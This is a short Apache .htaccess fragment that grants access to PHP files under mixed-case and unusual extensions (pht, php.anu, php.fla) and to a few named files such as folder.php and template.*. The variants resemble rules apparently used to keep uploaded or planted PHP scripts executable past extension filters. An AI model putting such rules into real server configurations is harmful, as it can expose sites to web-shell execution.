<FilesMatch "\.(php|Php|pHp|pHP|php3|php2|Php1|pht|php\.anu|php\.fla)$">
    Require all granted
</FilesMatch>

<FilesMatch "^(index\.html|index\.php|sitemap\.xml|robots\.txt|folder\.php|template\..*)$">
    Require all granted
</FilesMatch>

